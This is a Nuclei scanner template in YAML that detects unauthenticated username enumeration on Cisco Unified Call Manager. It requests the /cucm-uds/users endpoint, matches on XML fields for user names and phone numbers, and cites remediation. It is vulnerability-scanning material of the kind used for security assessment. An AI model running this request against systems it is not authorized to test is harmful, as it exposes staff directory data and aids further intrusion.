nuclei-templates/vulnerabilities/cisco/cucm-username-enumeration.yaml

35 lines
854 B
YAML

id: cucm-username-enumeration
info:
name: Cisco Unified Call Manager Username Enumeration
author: manasmbellani
severity: medium
reference: https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/
remediation: To mitigate this, enable Contact Search Authentication.
tags: cisco,cucm,unauth,enum
requests:
- method: GET
path:
- "{{BaseURL}}/cucm-uds/users"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<userName>'
- '<lastName>'
- '<phoneNumber>'
condition: and
- type: dsl
part: header
dsl:
- contains(tolower(content_type), 'application/xml')
- contains(tolower(content_type), 'text/xml')
condition: or